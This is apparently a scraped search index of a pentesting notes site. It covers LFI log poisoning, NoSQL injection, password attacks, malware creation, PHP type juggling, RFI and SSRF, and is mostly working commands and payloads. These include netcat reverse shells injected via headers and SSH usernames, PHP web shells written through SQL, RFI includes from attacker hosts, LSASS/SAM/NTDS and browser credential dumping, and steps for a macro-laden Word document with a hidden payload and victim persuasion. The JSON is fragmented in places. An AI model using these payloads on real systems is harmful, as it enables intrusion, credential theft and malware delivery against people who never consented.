                        When it comes to get a shell here, we need to use PHP function passthru, which is similar to the exec command:

                        passthru\u00a0\u2014\u00a0Execute an external program and display raw output

                        In this case, we would be adding in the user agent header the reverse shell:

                        <?passthru(\"nc -e /bin/sh <attacker IP> <attacker port>\") ?> \n
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/local-file-inclusion-lfi/#varlogauthlog-or-varlogapache2accesslog","title":"/var/log/auth.log or /var/log/apache2/access.log","text":"

                        If we have the ability to read a log file, then we can see if we can write in them in a malicious way.

                        For instance, with /var/log/auth.log, we can try an ssh connection and see how these attemps are recorded on the file. Then, instead of using a real username, I can set some php code:

                        ssh \"<?passthru('nc -e /bin/sh <attacker IP> <attacker port>');?>\"@$ip \n

                        But there might be problems with blank spaces, slashes and so on, so one thing you can do is base64 encoded your netcat command, and tell the function to decode it before executing it

                        # base64 encode your netcat command: nc -e /bin/sh <attacker IP> <attacker port>\nssh \"<?passthru(base64_decode'<base64 encoded text>');?>\"@$ip \n

                        Now just get a netcat listener in your kali attacker machine.

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/local-file-inclusion-lfi/#tools-and-payloads","title":"Tools and payloads","text":"
                        • See updated chart: Attacks and tools for web pentesting.
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/nosql-injection/","title":"NoSQL injection","text":"

                        Dictionary for NoSQL injections.

                        Examples of NoSQL databases: redis, mongo.

                        SQL stands for Structure Query Language. NoSQL Injection is a security vulnerability that occurs in applications that utilize NoSQL databases. It is a type of attack that involves an attacker manipulating a NoSQL database query by injecting malicious input, leading to unauthorized access, data leakage, or unintended operations. In traditional SQL Injection attacks, attackers exploit vulnerabilities by inserting malicious SQL code into input fields that are concatenated with database queries. Similarly, in NoSQL Injection, attackers exploit weaknesses in the application's handling of user-supplied input to manipulate NoSQL database queries.

                        How does it work a NoSQL injection? Explanation:

                        # MongoDB query\nvar query = {\nusername: username,\npassword: password\n};\n\n# Perform query to check if credentials are valid\nvar result = db.users.findOne(query);\n\nif (result) {\n// Login successful\n} else {\n// Login failed\n

                        In this example, the application constructs a MongoDB query using user-supplied values for the username and password fields. If an attacker intentionally provides a specially crafted value, they could potentially exploit a NoSQL injection vulnerability. For instance, an attacker might enter the following value as the username parameter:

                        $gt:\"\"\n

                        The attacker could potentially bypass the login mechanism and gain unauthorized access.

                        Typical payloads:

                        # Payload\nusername[$ne]=1$password[$ne]=1\n# Use case/Function: Not equals to (Auth Bypass)                |\n\n# Payload\nusername[$regex]=^adm$password[$ne]=1\n# Use case/Function: Checks a regular expression (Auth Bypass)\n\n# Payload\nusername[$regex]=.{25}&pass[$ne]=1\n# Use case/Function: Checks regex to find the length of a value\n\n# Payload\nusername[$eq]=admin&password[$ne]=1 \n# Use case/Function: Equals to.\n\n# Payload\nusername[$ne]=admin&pass[$gt]=s \n# Use case/Function: Greater than.\n

                        Example of a user search form:

                        With the not equal operator, it will return all users except for \"admin\".

                        ","tags":["pentesting","web","pentesting"]},{"location":"webexploitation/password-attacks/","title":"Password attacks","text":"","tags":["OSCP"]},{"location":"webexploitation/password-attacks/#connecting-to-target","title":"Connecting to Target","text":"
                        # CLI-based tool used to connect to a Windows target using the Remote Desktop Protocol\nxfreerdp /v:<ip> /u:htb-student /p:HTB_@cademy_stdnt!\n
                        # Uses Evil-WinRM to establish a Powershell session with a target. \nevil-winrm -i <ip> -u user -p password\n
                        # Uses SSH to connect to a target using a specified user.\nssh user@<ip>\n
                        # Uses smbclient to connect to an SMB share using a specified user.\nsmbclient -U user \\\\\\\\<ip>\\\\SHARENAME\n
                        # Uses smbserver.py to create a share on a linux-based attack host. Can be useful when needing to transfer files from a target to an attack host.\npython3 smbserver.py -smb2support CompData /home/<nameofuser>/Documents/\n
                        ","tags":["OSCP"]},{"location":"webexploitation/password-attacks/#password-mutations","title":"Password mutations","text":"
                        # Uses cewl to generate a wordlist based on keywords present on a website.\ncewl https://www.inlanefreight.com -d 4 -m 6 --lowercase -w inlane.wordlist\n
                        # Uses Hashcat to generate a rule-based word list.\nhashcat --force password.list -r custom.rule --stdout > mut_password.list\n
                        # Users username-anarchy tool in conjunction with a pre-made list of first and last names to generate a list of potential username. \n./username-anarchy -i /path/to/listoffirstandlastnames.txt\n
                        # Uses Linux-based commands curl, awk, grep and tee to download a list of file extensions to be used in searching for files that could contain passwords. \ncurl -s https://fileinfo.com/filetypes/compressed \\| html2text \\| awk '{print tolower($1)}' \\| grep \"\\.\" \\| tee -a compressed_ext.txt\n
                        ","tags":["OSCP"]},{"location":"webexploitation/password-attacks/#remote-password-attacks","title":"Remote Password Attacks","text":"
                        # Uses CrackMapExec over WinRM to attempt to brute force user names and passwords specified hosted on a target.\ncrackmapexec winrm <ip> -u user.list -p password.list\n
                        # Uses CrackMapExec to enumerate smb shares on a target using a specified set of credentials. \ncrackmapexec smb <ip> -u \"user\" -p \"password\" --shares\n
                        # Uses Hydra in conjunction with a user list and password list to attempt to crack a password over the specified service.\nhydra -L user.list -P password.list <service>://<ip>\n
                        # Uses Hydra in conjunction with a username and password list to attempt to crack a password over the specified service.\nhydra -l username -P password.list <service>://<ip>\n
                        # Uses Hydra in conjunction with a user list and password to attempt to crack a password over the specified service.\nhydra -L user.list -p password <service>://<ip>  \n
                        # Uses Hydra in conjunction with a list of credentials to attempt to login to a target over the specified service. This can be used to attempt a credential stuffing attack.\nhydra -C <user_pass.list> ssh://<IP>\n
                        # Uses CrackMapExec in conjunction with admin credentials to dump password hashes stored in SAM, over the network. \ncrackmapexec smb <ip> --local-auth -u <username> -p <password> --sam\n
                        # Uses CrackMapExec in conjunction with admin credentials to dump lsa secrets, over the network. It is possible to get clear-text credentials this way. \ncrackmapexec smb <ip> --local-auth -u <username> -p <password> --lsa\n
                        # Uses CrackMapExec in conjunction with admin credentials to dump hashes from the ntds file over a network. \ncrackmapexec smb <ip> -u <username> -p <password> --ntds\n
                        # Uses Evil-WinRM to establish a Powershell session with a Windows target using a user and password hash. This is one type of `Pass-The-Hash` attack.\nevil-winrm -i <ip>  -u  Administrator -H \"<passwordhash>\" \n
                        ","tags":["OSCP"]},{"location":"webexploitation/password-attacks/#windows-local-password-attacks","title":"Windows Local Password Attacks","text":"
                        # A command-line-based utility in Windows used to list running processes.\ntasklist /svc                        \n
                        # Uses Windows command-line based utility findstr to search for the string \"password\" in many different file type.\nfindstr /SIM /C:\"password\" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml\n
                        # A Powershell cmdlet is used to display process information. Using this with the LSASS process can be helpful when attempting to dump LSASS process memory from the command line. \nGet-Process lsass\n
                        # Uses rundll32 in Windows to create a LSASS memory dump file. This file can then be transferred to an attack box to extract credentials. \nrundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump 672 C:\\lsass.dmp full\n
                        # Uses Pypykatz to parse and attempt to extract credentials & password hashes from an LSASS process memory dump file. \npypykatz lsa minidump /path/to/lsassdumpfile\n
                        # Uses reg.exe in Windows to save a copy of a registry hive at a specified location on the file system. It can be used to make copies of any registry hive (i.e., hklm\\sam, hklm\\security, hklm\\system).\nreg.exe save hklm\\sam C:\\sam.save\n
                        # Uses move in Windows to transfer a file to a specified file share over the network. \nmove sam.save \\\\<ip>\\NameofFileShare\n
                        # Uses Secretsdump.py to dump password hashes from the SAM database.\npython3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL\n
                        # Uses Windows command line based tool vssadmin to create a volume shadow copy for `C:`. This can be used to make a copy of NTDS.dit safely. \nvssadmin CREATE SHADOW /For=C:\n
                        # Uses Windows command line based tool copy to create a copy of NTDS.dit for a volume shadow copy of `C:`. \ncmd.exe /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2\\Windows\\NTDS\\NTDS.dit c:\\NTDS\\NTDS.dit \n
                        ","tags":["OSCP"]},{"location":"webexploitation/password-attacks/#linux-local-password-attacks","title":"Linux Local Password Attacks","text":"
                        # Script that can be used to find .conf, .config and .cnf files on a Linux system.\nfor l in $(echo \".conf .config .cnf\");do echo -e \"\\nFile extension: \" $l; find / -name *$l 2>/dev/null \\| grep -v \"lib\\|fonts\\|share\\|core\" ;done\n\n# Script that can be used to find credentials in specified file types. \nfor i in $(find / -name *.cnf 2>/dev/null \\| grep -v \"doc\\|lib\");do echo -e \"\\nFile: \" $i; grep \"user\\|password\\|pass\" $i 2>/dev/null \\| grep -v \"\\#\";done\n\n# Script that can be used to find common database files.\nfor l in $(echo \".sql .db .*db .db*\");do echo -e \"\\nDB File extension: \" $l; find / -name *$l 2>/dev/null \\| grep -v \"doc\\|lib\\|headers\\|share\\|man\";done\n\n# Uses Linux-based find command to search for text files.\nfind /home/* -type f -name \"*.txt\" -o ! -name \"*.*\"\n\n# Script that can be used to search for common file types used with scripts. \nfor l in $(echo \".py .pyc .pl .go .jar .c .sh\");do echo -e \"\\nFile extension: \" $l; find / -name *$l 2>/dev/null \\| grep -v \"doc\\|lib\\|headers\\|share\";done\n\n# Script used to look for common types of documents.\nfor ext in $(echo \".xls .xls* .xltx .csv .od* .doc .doc* .pdf .pot .pot* .pp*\");do echo -e \"\\nFile extension: \" $ext; find / -name *$ext 2>/dev/null \\| grep -v \"lib\\|fonts\\|share\\|core\" ;done\n\n# Uses Linux-based cat command to view the contents of crontab in search for credentials.\ncat /etc/crontab\n\n# Uses Linux-based  ls -la command to list all files that start with `cron` contained in the etc directory. \nls -la /etc/cron.*/                             \n\n# Uses Linux-based command grep to search the file system for key terms `PRIVATE KEY` to discover SSH keys. \ngrep -rnw \"PRIVATE KEY\" /* 2>/dev/null \\| grep \":1\"\n\n# Uses Linux-based grep command to search for the keywords `PRIVATE KEY` within files contained in a user's home directory. \ngrep -rnw \"PRIVATE KEY\" /home/* 2>/dev/null \\| grep \":1\"\n\n# Uses Linux-based grep command to search for keywords `ssh-rsa` within files contained in a user's home directory. \ngrep -rnw \"ssh-rsa\" /home/* 2>/dev/null \\| grep \":1\"\n\n# Uses Linux-based tail command to search the through bash history files and output the last 5 lines. \ntail -n5 /home/*/.bash*\n\n# Runs Mimipenguin.py using python3.\npython3 mimipenguin.py\n\n# Runs Mimipenguin.sh using bash.\nbash mimipenguin.sh                              \n\n# Runs Lazagne.py with all modules using python2.7             |\npython2.7 lazagne.py all\n\n# Uses Linux-based command to search for credentials stored by Firefox then searches for the keyword `default` using grep. \nls -l .mozilla/firefox/ \\| grep default \n\n# Uses Linux-based command cat to search for credentials stored by Firefox in JSON. \ncat .mozilla/firefox/1bplpd86.default-release/logins.json \\| jq .\n\n# Runs Firefox_decrypt.py to decrypt any encrypted credentials stored by Firefox. Program will run using python3.9. \npython3.9 firefox_decrypt.py\n\n# Runs Lazagne.py browsers module using Python 3.\npython3 lazagne.py browsers\n
                        ","tags":["OSCP"]},{"location":"webexploitation/password-attacks/#cracking-passwords","title":"Cracking Passwords","text":"
                        # Uses Hashcat to crack NTLM hashes using a specified wordlist.\nhashcat -m 1000 dumpedhashes.txt /usr/share/wordlists/rockyou.txt\n\n# Uses Hashcat to attempt to crack a single NTLM hash and display the results in the terminal output. \nhashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt --show\n\n# Uses unshadow to combine data from passwd.bak and shadow.bk into one single file to prepare for cracking. \nunshadow /tmp/passwd.bak /tmp/shadow.bak > /tmp/unshadowed.hashes\n\n# Uses Hashcat in conjunction with a wordlist to crack the unshadowed hashes and outputs the cracked hashes to a file called unshadowed.cracked. \nhashcat -m 1800 -a 0 /tmp/unshadowed.hashes rockyou.txt -o /tmp/unshadowed.cracked\n\n# Uses Hashcat in conjunction with a word list to crack the md5 hashes in the md5-hashes.list file. \nhashcat -m 500 -a 0 md5-hashes.list rockyou.txt\n\n# Uses Hashcat to crack the extracted BitLocker hashes using a wordlist and outputs the cracked hashes into a file called backup.cracked. \nhashcat -m 22100 backup.hash /opt/useful/seclists/Passwords/Leaked-Databases/rockyou.txt -o backup.cracked\n\n# Runs Ssh2john.pl script to generate hashes for the SSH keys in the SSH.private file, then redirects the hashes to a file called ssh.hash.\nssh2john.pl SSH.private > ssh.hash\n\n# Uses John to attempt to crack the hashes in the ssh.hash file, then outputs the results in the terminal. \njohn ssh.hash --show\n\n# Runs Office2john.py against a protected .docx file and converts it to a hash stored in a file called protected-docx.hash. \noffice2john.py Protected.docx > protected-docx.hash\n\n# Uses John in conjunction with the wordlist rockyou.txt to crack the hash protected-docx.hash. \njohn --wordlist=rockyou.txt protected-docx.hash\n\n# Runs Pdf2john.pl script to convert a pdf file to a pdf has to be cracked. \npdf2john.pl PDF.pdf > pdf.hash\n\n# Runs John in conjunction with a wordlist to crack a pdf hash. \njohn --wordlist=rockyou.txt pdf.hash            \n\n# Runs Zip2john against a zip file to generate a hash, then adds that hash to a file called zip.hash. \nzip2john ZIP.zip > zip.hash\n\n# Uses John in conjunction with a wordlist to crack the hashes contained in zip.hash. \njohn --wordlist=rockyou.txt zip.hash\n\n# Uses Bitlocker2john script to extract hashes from a VHD file and directs the output to a file called backup.hashes. \nbitlocker2john -i Backup.vhd > backup.hashes\n\n# Uses the Linux-based file tool to gather file format information. \nfile GZIP.gzip\n\n# Script that runs a for-loop to extract files from an archive. \nfor i in $(cat rockyou.txt);do openssl enc -aes-256-cbc -d -in GZIP.gzip -k $i 2>/dev/null \\| tar xz;done\n
                        ","tags":["OSCP"]},{"location":"webexploitation/payloads/","title":"Creating malware and custom payloads","text":"","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#av0id","title":"AV0id","text":"

                        AV0id.

                        ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#darkarmour","title":"Darkarmour","text":"

                        Darkarmour

                        ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#empire","title":"Empire","text":"

                        Empire cheat sheet.

                        ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#fatrat","title":"FatRat","text":"

                        FatRat cheat sheet.

                        ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#mythic-c2-framework","title":"Mythic C2 Framework","text":"

                        https://github.com/its-a-feature/Mythic The Mythic C2 framework is an alternative option to Metasploit as a Command and Control Framework and toolbox for unique payload generation. A cross-platform, post-exploit, red teaming framework built with GoLang, docker, docker-compose, and a web browser UI. It's designed to provide a collaborative and user friendly interface for operators, managers, and reporting throughout red teaming.

                        ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#msfvenom","title":"msfvenom","text":"

                        msfvenom cheat sheet.

                        ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#nishang","title":"Nishang","text":"

                        nishang cheat sheet

                        ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#syringe","title":"Syringe","text":"

                        syringe

                        ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#veil","title":"Veil","text":"

                        Veil cheat sheet.

                        ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#creating-malware-in-pdf","title":"Creating malware in pdf","text":"

                        These two modules in metasploit:

                        • exploit/windows/fileformat/adobe_pdf_embedded_exe
                        • exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
                        ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#creating-malware-in-word-document","title":"Creating malware in word document","text":"

                        1. Craft an executable

                        Use for instance veil.

                        2. Convert it to a VisualBasic script - macro code

                        locate exe2vba\n# Result: /usr/share/metasploit-framework/tools/exploit/exe2vba.rb\n\n# Go to the folder\ncd /usr/share/metasploit-framework/tools/exploit/\n\n# Create the malicious vba script\n./exe2vba.rb <first-parameter> path/to/nameOfOutputFile.vba\n# first parameter: malicious executable file that will be converted to macro code. Take the path to the .exe file provided by veil\n

                        3. Create an MS Word document

                        4. Opena new macro and embed macro code

                        5. Copy the payload as text in the word document. If it's too long, disguise it (set font color to white).

                        6. Convince the victim to have macros enabled.

                        7. Start a listener and wait for the victim to connect.

                        ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#creating-malware-in-a-firefox-addon","title":"Creating malware in a Firefox addon","text":"

                        Use the metasploit module to generate the addon: exploit/multi/browser/firefox_xpi_bootstrapped_addon

                        It will be served from SRVHOST:SRVPORT/URIPATH. This URL you can serve it from a phishing email.

                        ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/php-type-juggling-vulnerabilities/","title":"PHP Type Juggling Vulnerabilities","text":"

                        Read PHP Type Juggling Vulnerabilities.

                        Copy-pasted, quoted:

                        How vulnerability arises\n\nThe most common way that this particularity in PHP is exploited is by using it to bypass authentication.\n\nLet\u2019s say the PHP code that handles authentication looks like this:\n\nif ($_POST[\"password\"] == \"Admin_Password\") {login_as_admin();}\n\nThen, simply submitting an integer input of 0 would successfully log you in as admin, since this will evaluate to True:\n\n(0 == \u201cAdmin_Password\u201d) -> True\n

                        In the HackTheBox machine Base, login form was bypasseable by entering an empty array into the username and password parameters:

                        Original request\n\n\nPOST /login/login.php HTTP/1.1\nHost: base.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 57\nOrigin: http://base.htb\nConnection: close\nReferer: http://base.htb/login/login.php\nCookie: PHPSESSID=sh4obp53otv54vtsj0g6tev1tt\nUpgrade-Insecure-Requests: 1\n\nusername=admin&password=admin\n
                        Crafted request:\n\nPOST /login/login.php HTTP/1.1\nHost: base.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 57\nOrigin: http://base.htb\nConnection: close\nReferer: http://base.htb/login/login.php\nCookie: PHPSESSID=sh4obp53otv54vtsj0g6tev1tt\nUpgrade-Insecure-Requests: 1\n\nusername[]=admin&password[]=admin\n

                        How to know? By spotting the file login.php.swp in the /login exposed directory and reading its contents with:

                        vim -r login.php.swp\n# -r  -- list swap files and exit or recover from a swap file\n

                        Content:

                        <?php\nsession_start();\nif (!empty($_POST['username']) && !empty($_POST['password'])) {\n    require('config.php');\n    if (strcmp($username, $_POST['username']) == 0) {\n        if (strcmp($password, $_POST['password']) == 0) {\n            $_SESSION['user_id'] = 1;\n            header(\"Location: /upload.php\");\n        } else {\n            print(\"<script>alert('Wrong Username or Password')</script>\");\n        }\n    } else {\n        print(\"<script>alert('Wrong Username or Password')</script>\");\n    }\n}\n

                        Quoting from the article PHP Type Juggling Vulnerabilities: \"When comparing values, always try to use the type-safe comparison operator === instead of the loose comparison operator ==. This will ensure that PHP does not type juggle and the operation will only return True if the types of the two variables also match. This means that (7 === \u201c7\u201d) will return False.\"

                        ","tags":["web pentesting"]},{"location":"webexploitation/reflected-file-download-rfd/","title":"RFD attack - Reflected File Download","text":"

                        Reflected File Download attack (RFD) combines url path segments with web services vulnerable to JSONP injection, being the goal to deliver malware to end users of the system.

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/reflected-file-download-rfd/#cool-proof-of-concept","title":"Cool proof of concept","text":"

                        https://medium.com/@Johne_Jacob/rfd-reflected-file-download-what-how-6d0e6fdbe331.

                        Read more: https://hackerone.com/reports/39658

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/reflected-file-download-rfd/#prevention-and-mitigation","title":"Prevention and mitigation","text":"","tags":["pentesting","web pentesting"]},{"location":"webexploitation/reflected-file-download-rfd/#-x-content-type-options-nosniff-header-to-api-response","title":"- \"X-Content-Type-Options: nosniff\" header to API response.","text":"","tags":["pentesting","web pentesting"]},{"location":"webexploitation/reflected-file-download-rfd/#tools-and-payloads","title":"Tools and payloads","text":"
                        • See updated chart: Attacks and tools for web pentesting.
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-code-execution-rce/","title":"RCE attack - Remote Code Execution","text":"OWASP
                        [OWASP Web Security Testing Guide 4.2](../OWASP/index.md) > 7. Data Validation Testing > 7.8. Testing for SSI Injection\n
                        ID Link to Hackinglife Link to OWASP Description 7.8 WSTG-INPV-08 Testing for SSI Injection - Identify SSI injection points (Presense of .shtml extension) with these characters: < ! # = / . \" - > and [a-zA-Z0-9] - Assess the severity of the injection.

                        RCE\u00a0attacks involve attackers manipulating network traffic by exploiting code vulnerabilities to access a corporate system.

                        Exploiting Blind Remote Execution Vulnerability attack in a GET request in BurpSuite (to run the queries) and Wireshark (to capture the traffic).

                        ________\nGET /script.php?c=sleep+5&ok=ok HTTP/1.1\nHost 192.168.137.130\nUser Agent....\n...\n________\n

                        Also other command:

                        GET /script.php?c=ping+192.168.139.130+-c+5&ok=ok HTTP/1.1\n
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-code-execution-rce/#gaining-a-reverse-shell-from-sql-injection","title":"Gaining a reverse shell from SQL injection","text":"

                        Take a wordpress installation that uses a mysql database. If you manage to login into the mysql pannel (/phpmyadmin) as root then you could upload a php shell to the /wp-content/uploads/ folder.

                        Select \"<?php echo shell_exec($_GET['cmd']);?>\" into outfile \"/var/www/https/blogblog/wp-content/uploads/shell.php\";\n

                        Now code can be executed from the browser:

                        https://example.com/blogblog/wp-content/uploads/shell.php?cmd=cat+/etc/passwd\n

                        One more example:

                        Select \"<?php $output=shell_exec($_GET['cmd']);echo \"<pre>\".$output.\"</pre>\"?>\" into outfile \"/var/www/https/shell.php\" from mysql.user limit 1;\n

                        Now code can be executed from the browser:

                        https://example.com/shell.php?cmd=cat+/etc/passwd\n
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-file-inclusion-rfi/","title":"RFI attack - Remote File Inclusion","text":"OWASP

                        OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.1. Testing Directory Traversal File Include

                        ID Link to Hackinglife Link to OWASP Description 5.1 WSTG-ATHZ-01 Testing Directory Traversal File Include - Identify injection points that pertain to path traversal. - Assess bypassing techniques and identify the extent of path traversal (dot-dot-slash attack, Local/Remote file inclusion)

                        A Remote File Inclusion (RFI) vulnerability is a type of security flaw found in web applications that allow an attacker to include and execute remote files on a web server. This vulnerability arises due to improper handling of user-supplied input within the context of file inclusion operations. This vulnerability can have severe consequences, including unauthorized access, data theft, and even full compromise of the affected server.

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-file-inclusion-rfi/#causes","title":"Causes","text":"
                        • Insufficient Input Validation: The web application may not validate or filter user input, allowing attackers to inject malicious data.
                        • Lack of Proper Sanitization: Even if input is validated, the application may not adequately sanitize the input before using it in file inclusion operations.
                        • Using User Input in File Paths: Applications that dynamically include files based on user input are at high risk if they don't carefully validate and control that input.
                        • Failure to Implement Security Controls: Developers might overlook security best practices, such as setting proper file permissions or using security mechanisms like web application firewalls (WAFs).
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-file-inclusion-rfi/#how-to-exploit-it","title":"How to exploit it?","text":"

                        Identify Vulnerable Input: The attacker identifies a web application that accepts user input and uses it in a file inclusion operation, typically in the form of a URL parameter or a POST request parameter.

                        Inject Malicious Payload: The attacker injects a malicious file path or URL into the vulnerable parameter. For example, they might replace a legitimate parameter like ?page=about.php with ?page=http://evil.com/malicious_script.

                        Server Executes Malicious Code: When the web application processes the attacker's input, it dynamically includes the remote file or URL. This can lead to remote code execution on the web server, as the malicious code in the included file is executed in the server's context.

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-file-inclusion-rfi/#php","title":"php","text":"

                        In php.ini file there are some parameters that define this policy:

                        • allow_url_fopen
                        • allow_url_include

                        If these functions are enabled (set to ON), then a LFI can turned into a Remote File Inclusion.

                        1. Create a php file with the remote shell

                        nano reverse.txt\n

                        2. In that php file, craft malicious code

                        <?php\npassthru(\"nc -e /bin/sh <attacker IP> <attacker port>\") \nphp ?>\n
                        3. Serve that file from you machine (http_serve).

                        4. Get your machine listening in a port with netcat.

                        5. In the injection point from where you can make a call to a URL, serve your file. For instance:

                        https:\\\\VICTIMurlADDRESS/PATH/PATH/page=http://<attackerip>/reverse.txt\n\n# Sometimes to get php executed on the victim machin (and not the attacker), add an ?\nhttps:\\\\VICTIMurlADDRESS/PATH/PATH/page=http://<attackerip>/reverse.txt?\n

                        Sometimes there might be some filtering for the payload (which was:

                        http://<attackerip>/reverse.txt?). \n````\n\nTo bypass it:\n
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-file-inclusion-rfi/#using-uppercase","title":"using uppercase","text":"

                        https:\\VICTIMurlADDRESS/PATH/PATH/page=hTTP:///reverse.txt","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-file-inclusion-rfi/#other-bypassing-techniques-for-slashes","title":"Other bypassing techniques for slashes","text":"

                        ## Wrappers\n\n### PHP wrapper\n\nphp://filter : allow the attacker to include local file and base64 encode as the output:\n
                        http://IPdomain/rfi.php?language=php://filter/convert.base64-encode/resource=recurso.php
                        PHP filter without base64 encode:\n
                        php://filter/resource=flag.txt
                        ### DATA wrapper\n
                        http://IPdomain/rfi.php?language=data://text/plain,<?php system('$_GET(\"cmd\")');?>&cmd=whoami
                        ### HTTP wrapper\n
                        http://IPdomain/rfi.php?language=http://SERVERIP/shell.php ```

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-file-inclusion-rfi/#mitigation","title":"Mitigation","text":"

                        In php.ini disallow:

                        • allow_url_fopen
                        • allow_url_include

                        User static file inclusion (instead of dynamic file inclusion) by harcoding the files you want to include and not get them using GET or POST methods.

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-file-inclusion-rfi/#tools-and-payloads","title":"Tools and payloads","text":"
                        • See updated chart: Attacks and tools for web pentesting.
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-request-forgery-ssrf/","title":"SSRF attack - Server Side Request Forgery","text":"OWASP

                        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.19. Testing for Server-Side Request Forgery

                        ID Link to Hackinglife Link to OWASP Description 7.19 WSTG-INPV-19 Testing for Server-Side Request Forgery - Identify SSRF injection points. - Test if the injection points are exploitable. - Asses the severity of the vulnerability.

                        Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make requests to an unintended location. The attacker could create a request to internet or to the intranet, which can be used to port scan or probe a remote machine. Basically, it could allow an atacker to:

                        • Take control of a remote machine.
                        • Read or update data.
                        • Read the server configuration.
                        • Connect to internal services...

                        With:

                        http://\nfile:///\ndict://\n
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-request-forgery-ssrf/#exploitation","title":"Exploitation","text":"","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-request-forgery-ssrf/#load-the-contents-of-a-file","title":"Load the Contents of a File","text":"
                        GET https://example.com/page?page=https://malicioussite.com/shell.php\n

                        See Burpsuite Labs

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-request-forgery-ssrf/#read-files-from-restricted-resources","title":"Read files from restricted resources","text":"
                        GET https://example.com/page?page=https://localhost:8080/admin\nGET https://example.com/page?page=https://127.0.0.1:8080/admin\nGET https://example.com/page?page=file:///etc/passwd\n
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-request-forgery-ssrf/#read-files-from-other-backend-systems","title":"Read files from other backend systems","text":"

                        In some cases, the application server is able to interact with back-end systems that are not directly reachable by users. These systems often have non-routable private IP addresses.

                        GET https://example.com/page?page=https://localhost:3306/\nGET https://example.com/page?page=https://localhost:6379/\nGET https://example.com/page?page=https://localhost:8080/\n

                        Gopherus sends non authenticated requests to other services and it succedde

                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-request-forgery-ssrf/#techniques","title":"Techniques","text":"

                        Bypass blacklist-based input filters

                        Some applications block input containing hostnames like 127.0.0.1 and localhost, or sensitive URLs like /admin. In this situation, you can often circumvent the filter using the following techniques:

                        • Use an alternative IP representation of\u00a0127.0.0.1, such as\u00a02130706433,\u00a0017700000001, or\u00a0127.1.
                        • Register your own domain name that resolves to\u00a0127.0.0.1. You can use\u00a0spoofed.burpcollaborator.net\u00a0for this purpose.
                        • Obfuscate blocked strings using URL encoding or case variation.
                        • Provide a URL that you control, which redirects to the target URL. Try using different redirect codes, as well as different protocols for the target URL. For example, switching from an\u00a0http:\u00a0to\u00a0https:\u00a0URL during the redirect has been shown to bypass some anti-SSRF filters.

                        Bypass whitelist-based input filters

                        Some applications only allow inputs that match, a whitelist of permitted values. The filter may look for a match at the beginning of the input, or contained within in it. You may be able to bypass this filter by exploiting inconsistencies in URL parsing.

                        • Using the\u00a0@\u00a0character to separate between the userinfo and the host:\u00a0`https://expected-host:fakepassword@evil-host
                        • URL fragmentation with the\u00a0#\u00a0character:\u00a0https://attacker-domain#expected-domain
                        • You can leverage the DNS naming hierarchy to place required input into a fully-qualified DNS name that you control. For example: - https://expected-host.evil-host
                        • URL encoding. Double URL-encode characters to confuse the URL-parsing code.
                        • Fuzzing
                        • Combinations of all of the above
                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-request-forgery-ssrf/#exploiting-redirection-vulnerabilities","title":"Exploiting redirection vulnerabilities","text":"

                        It is sometimes possible to bypass filter-based defenses by exploiting an open redirection vulnerability.

